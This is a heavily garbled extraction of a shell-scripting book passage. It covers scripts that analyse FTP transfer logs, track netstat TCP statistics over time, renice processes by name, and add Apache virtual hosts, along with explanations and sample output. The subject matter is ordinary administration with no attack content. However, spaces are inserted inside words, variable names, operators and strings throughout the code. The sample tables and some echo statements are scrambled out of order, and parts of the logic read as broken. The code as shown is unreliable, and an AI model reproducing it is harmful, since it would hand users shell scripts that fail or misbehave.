by tes i n=" $( awk ' BEGI N{su m=0} $ 12= = " i" { s um + = $ 8} E N D{ pr in t s um }' $ l og ) "
b yt eso u t=" $( awk ' BEGI N{su m=0} $ 12= = " o" { s um + = $ 8} E N D{ pr in t s um }' $ l og ) "
Ironically, the slower the network connection, the more accurate the total connection time is. On a fast network, smaller
transfers are logged as taking zero seconds, though clearly every transfer that succeeds must be longer than that.
Three types of access mode are possible: a is anonymous, g is for users who utilize the guest account (usually
password protected), and r is for real or regular users. In the case of anonymous and guest users, the account value
(field 14) is the user's password. People connecting anonymously are requested by their FTP program to specify their
email address as their password, which is then logged and can be analyzed.
Of this entire x fer lo g output stream, the most important entries are those with an anonymous access mode and a
direction of i , indicating that the entry is an upload listing. If you have allowed anonymous connections and have either
deliberately or accidentally left a directory writable, these anonymous upload entries are where you'll be able to see if
skript kiddies, warez hackers, and other characters of ill repute are exploiting your system. If such an entry lists a file
uploaded to your server, it needs to be checked out immediately, even if the file-name seems quite innocuous.
This test occurs in the following statement in the e xtr a c t function:
a wk "\ $ 13 == \" $1 \" & & \$ 12 == \"i \ " { p r in t \$ 9 } " $ lo g | s o rt | \
u niq -c | sor t -rn | he ad -1 0 | s e d ' s / ^/
/ ' > $ te m p
In this rather complex a wk invocation, we're checking to see whether field 13 matches the anonymous account code
(because ex tra ct is called as extr act " a " "An o n ymo u s A cc es s ") and whether field 12 indicates that it's
an upload with the code i . If both of these conditions are true, we process the value of field 9, which is the name of
the file uploaded.
If you're running an FTP server, this is definitely a script for a weekly (or even daily) cr on job.

Running the Script


If invoked without any arguments, this script tries to read and analyze the standard ft pd transfer log
/ va r/l o g/x fe rlo g. If that's not the correct log file, a different filename can be specified on the command line.

The Results
The results depend on the format of the transfer log the script is given. If it's an abbreviated form, some minimal
statistics are generated and the script quits:
$ x fer l og s ucc in ct.x ferl og
A bb rev i ate d ftp d xfer log from A ug 1 04: 2 0 :1 1 to Se p 1 0 4 :0 7: 4 1
byt es in : 215, 300, 253
byt es ou t: 30, 305, 090
When a full xf erl og in standard format is encountered, considerably more information can be obtained and
displayed by the script:
$ x fer l og
S um mar y of x fer lo g fr om M on Se p 1 5 : 03: 1 1 2 00 3 t o Tu e S e p 30 17 :3 8 :5 0 2 00 3
byt es in : 675, 840
b yte s out : 3,98 9,48 8
t ran s fer t ime : 11 s econ ds
A no nym o us Ac ces s
c omm o n a cc oun t (ent ered pass w ord ) val u e s:
1 t ay lor @i ntui tive .com

1 j oh n@d oe
f ile s do wn loa de d fr om s erver :
1 / My Sub sc ript ions .opml
f ile s up lo ade d to s erve r:
1 / tm p/F in d.Wa rez. txt
R ea l U s er Ac cou nt Acc ess
u ser acc ou nts a cces sing serv e r:
7 r uf us
2 t ay lor
f ile s do wn loa de d fr om s erver :
7 / pu b/A ll File s.tg z
2 / pu b/A ll File s.ta r
Security Alert! Did you notice that someone using anonymous FTP has uploaded a file called
/ tm p/F i nd. Wa rez .t xt? "Warez" are illegal copies of licensed software not something you want on your
server. Upon seeing this, I immediately went into my FTP archive and deleted the file.

#90 Monitoring Network Status


One of the most puzzling administrative utilities in Unix is ne t s ta t, which is too bad, because it offers quite a bit of
useful information about network throughput and performance. With the -s flag, n e ts t at outputs volumes of
information about each of the protocols supported on your computer, including TCP, UDP, IPv6, ICMP, IPsec, and
more. Most of those protocols are irrelevant for a typical configuration; the protocol to examine is TCP. This script
analyzes TCP protocol traffic, determining the percentage of failure and including a warning if any values are out of
bounds.
Analyzing network performance as a snapshot of long-term performance is useful, but a much better way to analyze
data is with trends. If your system regularly has 1.5 percent packet loss in transmission, and in the last three days the
rate has jumped up to 7.8 percent, a problem is brewing and needs to be analyzed in more detail.
As a result, Script #90 is in two parts. The first part is a short script that is intended to run every 10 to 30 minutes,
recording key statistics in a log file. The second script parses the log file and reports typical performance and any
anomalies or other values that are increasing over time.
Caution Some flavors of Unix can't run this code as is! It turns out that there is quite a variation in the output
format of the net stat command between Linux and Unix versions. This code works for Mac OS X and
FreeBSD; the changes for other Unixes should be straightforward (check the log file to see if you're
getting meaningful results to ascertain whether you need to tweak it).

The Code
#! /bin /sh
# gets tats - Ev ery 'n ' mi nut es, g rab s n ets t at s v a lu e s (v i a c ro n ta b) .
lo gfil e="/ var /l og/ net stat .lo g"
te mp=" /tmp /ge ts tat s.t mp"
tr ap " /bin /rm - f $ tem p" 0
( echo -n "ti me =$( dat e +% s); "
ne tsta t -s -p t cp > $ temp
se nt=" $(gr ep 'p ack ets sen t' $tem p | c u t -d \ - f 1 | s e d 's / [^ [ :d i gi t: ] ]/ / g' ) "
re sent ="$( gre p 're tra nsmi tte d' $ t emp | cut -d \ - f 1 | s ed 's / [^ [ :d ig i t: ] ]/ / g' )"
re ceiv ed=" $(g re p ' pac kets re ceiv e d$' $ t emp | c ut -d \ - f1 | \
sed 's/[ ^[: di git :]] //g' )"
du pack s="$ (gr ep 'd upl icat e a cks' $te m p | c u t - d\ -f 1 | \
sed 's/[ ^[: di git :]] //g' )"
ou tofo rder ="$ (g rep 'o ut-o f-o rder pac k e t s' $ te m p | c u t -d \ - f 1 | \
sed 's/[ ^[: di git :]] //g' )"
co nnec treq ="$ (g rep 'c onne cti on r e que s t s ' $ t em p | cu t - d\ -f 1 | \
sed 's/[ ^[: di git :]] //g' )"
co nnec tacc ="$ (g rep 'c onne cti on a c cep t s ' $t e mp | c ut -d \ - f1 | \
sed 's/[ ^[: di git :]] //g' )"
re tmou t="$ (gr ep 'r etr ansm it time o uts ' $ tem p | cu t - d \ -f 1 | \
sed 's/[ ^[: di git :]] //g' )"
ec ho - n "s nt= $s ent ;re =$re sen t;re c =$r e c e ive d ;d u p= $ du p ac ks ; "
ec ho - n "o o=$ ou tof ord er;c req =$co n nec t r e q;c a cc = $c o nn e ct ac c ;"
ec ho " reto =$r et mou t"
) >> $ logf ile
ex it 0
The second script analyzes the n ets tat historical log file:
#! /bin /sh
# netp erf - A na lyz ea the net stat run n i n g p e rf o rm a nc e l og , i d en t if yi n g
#
i mpor tan t res ult s an d t rend s .
lo g="/ var/ log /n ets tat .log "

sc ript bc=" $HO ME /bi n/s crip tbc "


# Sc r i p t # 9
st ats= "/tm p/n et per f.s tats .$$ "
aw ktmp ="/t mp/ ne tpe rf. awk. $$"
tr ap " /bin /rm - f $ awk tmp $st ats" 0
if [ ! -r $lo g ] ; th en
echo "Er ror : can 't read ne tsta t lo g f ile $l o g" >& 2
exit 1
fi
# Firs t, r epo rt th e b asic st atis t ics o f th e l a te s t e nt ry in th e l og fi l e. . .
ev al $ (tai l - 1 $lo g)

# al l va l ues t u rn i nt o s h el l v ar i ab l es

re p="$ ($sc rip tb c - p 3 $re /$s nt\* 1 00) "


re pn=" $($s cri pt bc -p 4 $r e/$ snt\ * 100 0 0 | c u t - d. -f 1 )"
re pn=" $(( $re pn / 100 ))"
re top= "$($ scr ip tbc -p 3 $ ret o/$s n t\* 1 0 0 )";
re topn ="$( $sc ri ptb c - p 4 $re to/$ s nt\ * 1 0 000 | c ut -d . - f1 ) "
re topn ="$( ( $ re top n / 100 )) "
du pp=" $($s cri pt bc -p 3 $d up/ $rec \ *10 0 ) " ;
du ppn= "$($ scr ip tbc -p 4 $ dup /$re c \*1 0 0 0 0 | cu t - d . - f1 )"
du ppn= "$(( $d up pn / 1 00 ) )"
oo p="$ ($sc rip tb c - p 3 $oo /$r ec\* 1 00) " ;
oo pn=" $($s cri pt bc -p 4 $o o/$ rec\ * 100 0 0 | c u t - d. -f 1 )"
oo pn=" $(( $oo pn / 100 ))"
ec ho " Nets tat i s c urr entl y r epor t ing t h e f o ll o wi n g: "
ec ho
ec ho
ec ho
ec ho
ec ho
ec ho

-n "
$s nt pa cke ts s ent , wi t h $ r e ret r an s mi t s ( $r ep % ) "
" and $re to re tra nsmi t t imeo u ts ( $ r eto p %) "
-n "
$r ec pa cke ts r ece ived , wi t h $du p d u pe s ( $ du pp % )"
" and $o o out of ord er ($oo p %)"
"
$ cre q tot al conn ect ion r equ e s t s, o f w hi c h $ ca cc we r e a cc ep t ed "
""

## Now let 's se e i f t here ar e an y im p o r tan t p r ob l em s t o f la g


if [ $ repn -g e 5 ] ; then
echo "** * W ar nin g: Retr ans mits of > = 5% i nd i ca t es a pr o bl e m "
echo "(g ate wa y o r r oute r f lood e d?) "
fi
if [ $ reto pn -g e 5 ] ; th en
echo "** * W ar nin g: Tran smi t ti m eou t s of > = 5 % i nd i ca te s a pr o bl em "
echo "(g ate wa y o r r oute r f lood e d?) "
fi
if [ $ dupp n - ge 5 ] ; the n
echo "** * W ar nin g: Dupl ica te r e cei v e s of >= 5% in d ic at e s a p r ob le m "
echo "(p rob ab ly on the oth er e n d)"
fi
if [ $ oopn -g e 5 ] ; then
echo "** * W ar nin g: Out of orde r s o f > = 5 % i n di c at e s a p ro b le m "
echo "(b usy n etw ork or rou ter/ g ate w a y fl o od ) "
fi
# Now let' s l oo k a t s ome his tori c al t r e nds . ..
ec ho " anal yzi ng tr end s... ."
wh ile read lo gl ine ; do
ev al " $lo gl ine "
re p2=" $($ sc rip tbc -p 4 $ re / $sn t \ * 1 0 00 0 | cu t - d. -f 1 )"
re top2 ="$ ($ scr ipt bc - p 4 $re t o / $ s nt \ * 1 00 0 0 | c ut -d . - f 1) "
du pp2= "$( $s cri ptb c -p 4 $dup / $ r e c \* 10 0 00 | c ut - d . - f1 ) "
oo p2=" $($ sc rip tbc -p 4 $ oo / $re c \ * 1 0 00 0 | cu t - d. -f 1 )"
ec ho " $re p2 $r eto p2 $ dup p2 $ o op2 " > > $ s ta t s
done < $ log
ec ho " "
# Now calc ula te so me stat ist ics, and c o mpa r e t he m t o t he cu r re n t va l ue s

ca t << "EO F" > $aw ktm p


{ rep += $1 ; r eto p += $2 ; du p p + = $ 3; o op += $4 }
EN D { rep /= 10 0; ret op / = 1 00; d upp / = 10 0 ; o op /= 10 0;
prin t " re ps= "in t(re p/N R) " ; ret o p s =" i nt ( re t op / NR ) \
" ;du pp s=" in t(du pp/ NR) " ;oo p s = "in t (o o p/ N R) }
EO F
ev al $ (awk -f $ awk tmp < $ sta ts)
if [ $ repn -g t $re ps ] ; the n
echo "** * W ar nin g: Retr ans mit r ate i s cu r re n tl y h i gh er th a n a ve ra g e. "
echo "
( av era ge is $ rep s% a n d c u r r ent is $r e pn % )"
fi
if [ $ reto pn -g t $ ret ops ] ; the n
echo "** * W ar nin g: Tran smi t ti m eou t s are cu r re n tl y h ig h er th a n av e ra g e. "
echo "
( av era ge is $ ret ops% and c u rre n t i s $ re t op n% ) "
fi
if [ $ dupp n - gt $d upp s ] ; t hen
echo "** * W ar nin g: Dupl ica te r e cei v e s ar e c u rr e nt l y hi g he r t h an a v er a ge . "
echo "
( av era ge is $ dup ps% a nd c u r ren t i s $ d up p n% )"
fi
if [ $ oopn -g t $oo ps ] ; the n
echo "** * W ar nin g: Out of orde r s a r e cur r en t ly hi g he r t ha n a v er ag e ."
echo "
( av era ge is $ oop s% a n d c u r r ent is $o o pn % )"
fi
ec ho \ (ana lyz ed $( wc -l < $s tats ) ne t s t at l og en t ri e s fo r c a lc u la ti o ns \ )
ex it 0

How It Works
The net stat program is tremendously useful, but its output can be quite intimidating. Here are just the first ten lines:
$ nets tat -s -p tc p | hea d
tc p:
36 083 p ack ets sen t
91 34 data pa cket s (1 0 9 5 816 by t es )
24 da ta p ack ets ( 564 0 b yte s ) r et r an s mi tt e d
0 res ends in itia t ed b y MTU di s co v er y
19 290 ack -on ly p a cke t s (13 8 56 de l ay e d)
0 URG onl y p acke t s
0 win dow pro be p a cke t s
62 95 wind ow upda t e p a c k ets
13 40 cont rol pac k ets
So the first step is to extract just those entries that contain interesting and important network performance statistics.
That's the main job of get stat s, and it does this by saving the output of the n e ts t at command into the temp file
$t emp and going through $ tem p ascertaining key values, such as total packets sent and received. To ascertain the
number of packets sent, for example, the script uses
se nt=" $(gr ep 'p ack ets sen t' $tem p | c u t -d \ - f 1 | s e d 's / [^ [ :d i gi t: ] ]/ / g' ) "
The sed invocation removes any nondigit values to ensure that no spaces or tabs end up as part of the resultant
value. Then all of the extracted values are written to the n e t sta t . lo g log file in the format
va r1Na me=v ar1 Va lue ; v ar2N ame =var 2 Val u e ; and so forth. This format will let us later use ev a l on
each line in n et sta t.l og and have all the variables instantiated in the shell:
ti me=1 0639 848 00 ;sn t=3 872; re= 24;r e c=5 0 6 5 ;du p =3 0 6; o o= 2 15 ;c r eq = 46 ; ca cc = 17 ; re t o= 17 0
The net perf script does the heavy lifting, parsing ne t s t at. l og and reporting both the most recent performance
numbers and any anomalies or other values that are increasing over time.
Although the ne tpe rf script seems complex, once you understand the math, it's quite straightforward. For example, it
calculates the current percentage of retransmits by dividing retransmits by packets sent and then multiplying this result
by 100. An integer-only version of the retransmission percentage is calculated by taking the result of dividing
retransmissions by total packets sent, multiplying it by 10,000, and then dividing by 100:
re p="$ ($sc rip tb c - p 3 $re /$s nt\* 1 00) "
re pn=" $($s cri pt bc -p 4 $r e/$ snt\ * 100 0 0 | c u t - d. -f 1 )"
re pn=" $(( $re pn / 100 ))"

As you can see, the naming scheme for variables within the script begins with the abbreviations assigned to the various
ne tsta t values, which are stored in net stat . l og at the end of the g et s ta ts script:
ec ho - n "s nt= $s ent ;re =$re sen t;re c =$r e c e ive d ;d u p= $ du p ac ks ; "
ec ho - n "o o=$ ou tof ord er;c req =$co n nec t r e q;c a cc = $c o nn e ct ac c ;"
ec ho " reto =$r et mou t"
The abbreviations are sn t, re, rec , dup , oo, cre q , ca c c , and r et o . In the ne t pe r f script, the p suffix is
added to any of these abbreviations for variables that represent decimal percentages of total packets sent or received.
The pn suffix is added to any of the abbreviations for variables that represent integer-only percentages of total packets
sent or received. Later in the n etper f script, the ps suffix denotes a variable that represents the percentage
summaries (averages) used in the final calculations.
The whi le loop steps through each entry of ne ts t a t.l o g , calculating the four key percentile variables (r e,
re tr, d up, and oo , which are retransmits, transmit timeouts, duplicates, and out of order, respectively). All are
written to the $s tat s temp file, and then the aw k script sums each column in $s ta t s and calculates average
column values by dividing the sums by the number of records in the file (NR ).
The following line in the script ties things together:
ev al $ (awk -f $ awk tmp < $ sta ts)
The awk invocation is fed the set of summary statistics ($ s tat s ) produced by the w hi le loop and utilizes the
calculations saved in the $a wkt mp file to output v a ri ab l e =va l u e sequences. These v a ri a bl e =v al u e
sequences are then incorporated into the shell with the e val statement, instantiating the variables r ep s , r et op s ,
du pps, and o ops , which are average retransmit, average retransmit timeouts, average duplicate packets, and
average out-of-order packets, respectively. The current percentile values can then be compared to these average
values to spot problematic trends.

Running the Script


For the n etpe rf script to work, it needs information in the net s ta t s log file. That information is generated by
having a cron tab entry that invokes get stat s with some level of frequency. On a modern Mac OS X, Unix, or
Linux system, the following cro ntab entry will work fine:
*/ 15 * * * */ ho me/ tay lor/ bin /get s tat s
It will produce a log file entry every 15 minutes. To ensure the necessary file permissions, it's best to actually create an
empty log file by hand before running gets tat s for the first time:
$ sudo tou ch /v ar/ log /net sta t.lo g
$ sudo chm od a+ rw /va r/lo g/n etst a t.l o g
Now the get st ats program should chug along happily, building a historical picture of the network performance of
your system. To actually analyze the contents of the log file, run n et p er f without any arguments.

The Results
First off, let's check on the n ets tat .log file:
$ tail -3 /va r/ log /ne tsta t.l og
ti me=1 0639 818 01 ;sn t=1 4386 ;re =24; r ec= 1 5 7 00; d up = 44 4 ;o o =5 55 ; cr e q= 5 63 ;c a cc = 17 ; re to =158
ti me=1 0639 824 00 ;sn t=1 7236 ;re =24; r ec= 2 0 0 08; d up = 45 4 ;o o =8 48 ; cr e q= 5 70 ;c a cc = 17 ; re to =158
ti me=1 0639 830 00 ;sn t=2 0364 ;re =24; r ec= 2 5 0 22; d up = 58 9 ;o o =1 18 1 ;c r eq = 58 2; c ac c =1 7 ;r et o=158
It looks good, so let's run ne t perf and see what it has to report:
$ netp erf
Ne tsta t is cu rr ent ly repo rti ng t h e f o l l owi n g:
2510 8 pa cke ts se nt, wit h 2 4 re t ran s m i ts ( 0% ) a n d 1 58 r e tr a ns m it t i me o ut s ( .6 00%)
3442 3 pa cke ts re cei ved, wi th 1 5 29 d u p es ( 4. 4 00 % ) a nd 1 1 81 ou t o f o rd e r ( 3. 40 0%)
583 tot al co nne cti on r equ ests , of w h ich 17 we r e a cc ep t ed
an alyz ing tre nd s.. ..
** * Wa rnin g:
(a vera ge
** * Wa rnin g:
(a vera ge
(a naly zed 48

Du pli cat e re cei ves a re c u r ren t ly hi g he r t ha n a v er a ge .


is 3% an d cu rre nt i s 4% )
Ou t o f o rder s a re c u rre n t l y h i gh e r t ha n a ve r ag e .
is 0% an d cu rre nt i s 3% )
ne tst at log ent ries for c a lcu l at i on s )

Hacking the Script

You've likely already noticed that rather than using a human-readable date format, the ge t st at s script saves entries
in the ne tsta t.l og file using epoch time, which represents the number of seconds that have elapsed since January
1, 1970. For example, 1,063,983,000 seconds represents a day in late September 2003.
The use of epoch time will make it easier to enhance this script by enabling it to calculate the time lapse between
readings. If, for some odd reason, your system's date command doesn't have the % s option for reporting epoch time,
there's a short C program you can install to report the epoch time on just about any system:
ht tp:/ /www .in tu iti ve. com/ wic ked/ e xam p l e s/e p oc h .c

#91 Renicing Tasks by Process Name


There are many times when it's useful to change the priority of a specific task, whether it's an IRC or chat server that's
supposed to use only "spare" cycles, an MP3 player app or file download that has become less important, or a realtime CPU monitor being increased in priority. The ren i c e command, however, requires you to specify the process
ID, which can be a hassle. A much more useful approach is to have a script that matches process name to process ID
and then renices the specified application.

The Code
# !/ bin / sh
# r eni c ena me - Re nice s th e job tha t mat c h es t he sp ec i fi e d na m e.
u se r=" " ; t ty ="" ; show pid= 0; ni c eva l = "+1 "

# in i ti a li ze

w hi le g eto pt s " n: u:t: p" o pt; d o


c ase $op t in
n ) nic ev al= "$ OPTA RG";
;;
u ) if [ ! - z "$tt y" ] ; th e n
e ch o " $0 : er ror: -u a n d - t are m ut ua ll y e xc l us i ve ." >& 2
e xi t 1
fi
use r= $OP TA RG
;;
t ) if [ ! - z "$us er" ] ; t h en
e ch o " $0 : er ror: -u a n d - t are m ut ua ll y e xc l us i ve ." >& 2
e xi t 1
fi
tty =$ OPT AR G
;;
p ) sho wp id= 1;
;;
? ) ech o "Us ag e: $ 0 [- n nic e val ] [-u u se r| -t tt y] [- p ] pa t te rn " > &2
ech o "De fa ult nice val c h ang e is \ " $n ic ev a l\ " ( pl u s is lo we r " >& 2
ech o "pr io rity , mi nus i s hi g h er, b ut o nl y r oo t c a n go be lo w 0 )" >& 2
exi t 1
e sac
d on e
s hi ft $ (($ OP TIN D - 1) ) # eat a l l t h e pa r s ed a rg u me nt s
i f [ $ # -e q 0 ] ; the n
e cho "Us ag e: $0 [-n nic eval] [-u u ser | - t tt y] [- p] pa t te rn " > &2
e xit 1
fi
i f [ ! -z "$ tty " ] ; then
p id= $ (ps c u - t $tty | a wk "/ $1/ { pr i n t \\ $2 }" )
e li f [ ! - z "$u se r" ] ; t hen
p id= $ (ps c u - U $use r | awk " / $1 / { p r i nt \ \$ 2 } ")
e ls e
p id= $ (ps c u - U ${US ER:- LOGNA M E} | awk " / $1 / { p ri n t \ $2 } " )
fi
i f [ - z "$ pi d" ] ; th en
e cho "$0 : no pr oces ses match pat t e rn $ 1 " >& 2 ; e xi t 1
e li f [ ! - z "$( ec ho $ pid | gre p ' ' ) " ] ; t he n
e cho "$0 : mor e than one proc e ss m a tch e s p at te r n ${ 1 }: "
i f [ ! - z "$t ty " ] ; th en
ru n me= "p s c u -t $ tty"
e lif [ ! - z " $u ser" ] ; then
ru n me= "p s c u -U $ user "
e lse
ru n me= "p s c u -U $ {USE R:-LO G NAM E } "
fi
e val $ru nm e | \
a wk "/ $1 / { pr intf \"
u ser % -8. 8 s
pi d % -6 .6 s
j ob % s \n \" , \
\ $1, \$ 2,\ $1 1 }"

e cho "Us e -u us er o r -t tty t o n a r row d ow n yo u r se l ec t io n c ri te r ia ."


e li f [ $sh ow pid - eq 1 ] ; then
e cho $pi d
e ls e
# re a dy to go : let' s do it!
e cho -n "R eni ci ng j ob \ ""
e cho -n $( ps cp $pi d | sed ' s / [ ] */ / g ' | ta i l -1 |
cu t - d\ - f 5- )
e cho "\" ( $pi d) "
r eni c e $ ni cev al $pi d
fi
e xi t 0

How It Works
This script borrows liberally from the earlier Script #52, Killing Processes by Name, which does a similar mapping of
process name to process ID, but then kills the jobs, rather than just lowering their priority.
In this situation, you don't want to accidentally renice a number of matching processes (imagine re ni c en am e -n 1 0
" *" , for example), so the script fails if more than one process matches the criteria. Otherwise, it makes the change
specified and lets the actual reni ce program report any errors that may have been encountered.

Running the Script


You have a number of different possible options when running this script: - n v al allows you to specify the desired
n ic e (job priority) value. The default is specified as n i c eva l = 1. The -u u s er flag allows matching processes to
be limited by user, while - t tty allows a similar filter by terminal name. To see just the matching process ID and not
actually renice the application, use the -p flag. In addition to one or more flags, r e ni ce n am e requires a command
pattern that will be compared to the running process names on the system to ascertain which of the processes match.

The Results
First off, here are the results when there is more than one matching process:
$ r eni c ena me "v im "
r en ice n ame : mor e than one proc e ss m a tch e s p at te r n vi m :
u ser tay lo r
p id 1 0581
job vim
u ser tay lo r
p id 1 0949
job vim
U se -u use r or -t tty to narro w do w n yo u r s el ec t io n c ri t er ia .
I subsequently quit one of these processes and ran the same command:
$ r eni c ena me "v im "
R en ici n g j ob "v im " (1 0949 )
1 11 31: old p rio ri ty 0 , ne w pri o rit y 1
We can confirm that this worked by using the - al r (or -a l ) flags to p s:
$ p s - a lr
U ID
PI D PP ID CPU PRI NI
0
43 9
4 38
0
31
0
5 01
44 0
4 39
0
31
0
0 1 057 7
4 38
0
31
0
5 01 1 057 8 105 77
0
31
0
5 01 1 094 9 105 78
0
30
1
0 1 115 2
4 40
0
31
0

VS Z
1 404 8
182 8
1 404 8
182 8
1 100 4
137 2

RSS
568
756
572
760
2348
320

ST AT
TT
Ss
st d
S
st d
Ss
p2
S
p2
SN +
p2
R+
st d

TI ME
0: 0 0. 84
0: 0 0. 56
0: 0 0. 83
0: 0 0. 16
0: 0 0. 09
0: 0 0. 01

CO MM A ND
lo gi n - pf ta yl o r
-b as h ( ba s h)
lo gi n - pf ta yl o r
-b as h ( ba s h)
vi m r en ic e me
ps - a lr

Notice that the vim process (10949) has a nice value (the NI column) of 1, while everything else I'm running has a
nice value of 0, the standard user priority level.

Hacking the Script


An interesting addendum to this script is another script that watches for certain programs to be launched and
automatically renices them to a set priority; this can be helpful if certain Internet services or applications tend to
consume most of the CPU resources, for example. The script uses re n ic en a me to map process name to process
ID and then checks the process's current nice level and issues a re n ic e if the nice level specified as a command
argument is higher (a lesser priority) than the current level:
# !/ bin / sh

# w atc h _an d_ nic e - Wa tche s for the s pec i f ie d pr o ce ss na m e, a n d re n ic es it


#
to t he de sir ed val ue w hen s e en.
r en ice n ame =" $HO ME /bin /ren icena m e"
i f [ $ # -n e 2 ] ; the n
e cho "Us ag e: $( base name $0) d esi r e dni c e j ob na m e" > & 2
e xit 1
fi
p id ="$ ( $re ni cen am e -p "$2 ")"
i f [ ! -z "$ (ec ho $pi d | sed ' s /[0 - 9 ]*/ / g ') " ] ; t he n
e cho "Fa il ed to mak e a uniqu e ma t c h i n th e pr o ce ss ta b le f o r $2 " > &2
e xit 1
fi
c ur ren t nic e= "$( ps -lp $pi d | t a il - 1 | a w k '{ pr i nt $ 6 }' ) "
i f [ $ 1 -g t $cu rr entn ice ] ; t h en
e cho "Ad ju sti ng pri orit y of $ 2 t o $1"
r eni c e $ 1 $pi d
fi
e xi t 0
Within a c r on job, this script could be used to ensure that certain apps are pushed to the desired priority within a few
minutes of being launched.

#92 Adding New Virtual Host Accounts


This script is particularly useful for web administrators who serve a number of different domains and websites from a
single server. A great way to accomplish this is by using virtual hosting, a capability of Apache (and many other web
servers) to assign multiple domain names to the same IP address and then split them back into individual sites within
the Apache configuration file.
Just as adding a new account on a private machine requires the creation of a new home directory, creating a new
virtual host account requires creating a separate home for both the web pages themselves and the resultant log files.
The material added is straightforward and quite consistent, so it's a great candidate for a shell script.

The Code
# !/ bin / sh
# a ddv i rtu al - Ad ds a vir tual h ost t o a n Ap ac he co nf i gu r at io n f il e .
# Y ou' l l w an t t o modi fy a ll of the s e to p oi nt t o t he pr o pe r d ir ec t or ie s
d oc roo t ="/ et c/h tt pd/h tml"
l og roo t ="/ va r/l og /htt pd/"
h tt pco n f=" /e tc/ ht tpd/ conf /http d .co n f "
# S ome sit es us e 'apa chec tl' r a the r tha n re st ar t _a pa c he :
r es tar t ="/ us r/l oc al/b in/r estar t _ap a c he"
s ho won l y=0 ; tem po ut=" /tmp /addv i rtu a l .$$ "
t ra p " r m - f $te mp out $tem pout. 2 " 0
i f [ " $ 1" = "-n " ] ; then
s how o nly =1 ; sh ift
fi
i f [ $ # -n e 3 ] ; the n
e cho "Us ag e: $( base name $0) [ -n] d oma i n a dm in - em ai l o w ne r- i d" > & 2
e cho "
Wh ere - n sh ows what i t w o u ld d o , bu t d oe sn ' t d o an y th in g " >& 2
e xit 1
fi
# C hec k fo r com mo n an d pr obabl e er r o rs
i f [ $ ( id -u ) ! = "roo t" - a $sh o won l y = 0 ] ; th e n
e cho "Er ro r: $( base name $0) c an o n ly b e r un a s r oo t ." >& 2
e xit 1
fi
i f [ ! -z "$ (ec ho $1 | gr ep -E '^w w w \.' ) " ] ; t h en
e cho "Pl ea se om it t he w ww. p r efi x on t h e do ma i n na m e" >& 2
e xit 0
fi
i f [ " $ (ec ho $1 | sed 's/ //g' ) " ! = "$1 " ] ; th e n
e cho "Er ro r: Do main nam es ca n not h ave s pa ce s. " > &2
e xit 1
fi
i f [ - z "$ (g rep - E "^ $3" /etc/ p ass w d )" ] ; th en
e cho "Ac co unt $ 3 no t fo und i n pa s s wor d fi le " > &2
e xit 1
fi
# B uil d th e dir ec tory str uctur e an d dro p a fe w f il es th e re in
i f [ $ s how on ly -e q 1 ] ; then
t emp o ut= "/ dev /t ty"
# t o out p ut v i rtu a l ho st t o s td o ut
e cho "mk di r $ do croo t/$1 $log r oot / $ 1"
e cho "ch ow n $ 3 $doc root /$1 $ l ogr o o t/$ 1 "
e ls e

i f [ ! - d $do cr oot/ $1 ] ; th e n
if mkd ir $d oc root /$1 ; the n
e cho " Fai le d on mkd ir $d o cro o t /$1 : ex it in g ." > & 2 ; e xi t 1
fi
fi
i f [ ! - d $lo gr oot/ $1 ] ; th e n
mk d ir $l ogr oo t/$1
if [ $ ? -ne 0 -a $? - ne 17 ] ; t hen
# er ro r c od e 17 = d irect o ry a l rea d y e xi st s
e cho " Fai le d on mkd ir $d o cro o t /$1 : ex it in g ." > & 2 ; e xi t 1
fi
fi
c how n $3 $ doc ro ot/$ 1 $l ogroo t /$1
fi
# No w le t' s d ro p th e ne cessa r y b l o ck i n to t he ht tp d .c o nf f i le
c at < < E OF > $t empo ut
# ### # ## Vi rtu al Hos t se tup f o r $ 1 ### # # ## ## ##
< Vir t ual Ho st ww w.$1 $1>
S erv e rNa me ww w. $1
S erv e rAd mi n $ 2
D ocu m ent Ro ot $d ocro ot/$ 1
E rro r Log l ogs /$ 1/er ror_ log
T ran s fer Lo g l og s/$1 /acc ess_l o g
< /Vi r tua lH ost >
< Dir e cto ry $d oc root /$1>
O pti o ns In dex es Fol lowS ymLin k s I n c lud e s
A llo w Ove rr ide A ll
o rde r al lo w,d en y
a llo w fr om al l
< /Di r ect or y>
E OF
i f [ $sh ow onl y -eq 1 ]; then
ec h o " Ti p: Co py t he a bove b loc k int o $h tt pc o nf a n d"
ec h o " re sta rt the ser ver w i th $ r est a r t an d y ou 'r e d o ne ."
ex i t 0
fi
# Le t 's ha ck th e ht tpd. conf f ile
d ate = "$( da te +% m%d% H%m) "
c p $ h ttp co nf $h ttpc onf. $date
#
#
#
#

Fi g ure o ut wh at
Ye s , t hi s m ea ns
en t rie s alr ea dy
th e -n f lag a nd

# mon t h d ay h o ur m i nu t e
# bac k u p co py of c o nf i g fi l e

l ine in th e fi l e ha s th e la s t </ V ir t ua lH o st > e nt ry .


t hat the s c rip t won ' t w or k i f th e re ar e N O vi r tu al h os t
i n th e htt p d.c o n f f i l e. I f t he re ar e n o e nt ri e s, j u st u s e
p aste the m ate r i al i n m an ua l ly .. .

a dda f ter =" $(c at -n $htt pconf | gre p '</ V i rt ua lH o st >' | aw k ' NR = =1 { p ri nt $1 }' ) "
i f [ -z "$ add af ter" ]; then
ec h o " Er ror : Can' t fi nd a < /Vi r t ual H o st > li n e in $h t tp co n f" > & 2
/b i n/r m -f $h ttpc onf. $date ; ex i t 1
fi
s ed " ${a dd aft er }r $ temp out" < $h t t pco n f > $ te m po ut . 2
m v $te m pou t. 2 $ ht tpco nf
i f $re s tar t ; t he n
m v $ h ttp co nf $h ttpc onf. faile d .$d a t e
m v $ h ttp co nf. $d ate $htt pconf
$ res t art
e cho "Co nf igu ra tion app ears t o h a v e f a i le d; r e st ar t ed wi th ol d c on fi g " >& 2

fi

e cho "Fa il ed co nfig urat ion i s in $ htt p c on f. fa i le d. $ da t e" > & 2


e xit 1

e xi t 0

How It Works
Though long, this script is quite straightforward, as most of it is focused on various output messages. The error
condition checks in the first section are complex conditionals that are worth exploring. The most complex of them
checks the ID of the user running the script:
i f [ $ ( id -u ) ! = 0 -a $sh owonl y = 0 ]; t h en
This test can be paraphrased as, If you aren't r o o t, and you haven't specified that you want only the commands
displayed on the terminal, then ...
After each Unix command, this script checks the return code to ensure that things went well, which catches most of the
common errors. The one error not caught this way occurs if there's no ch o wn command or if the ch ow n command
can be run only by roo t. If that's the case, simply comment out the following line, or alter it to work properly:
c ho wn $ 3 $ do cro ot /$1 $log root/ $ 1
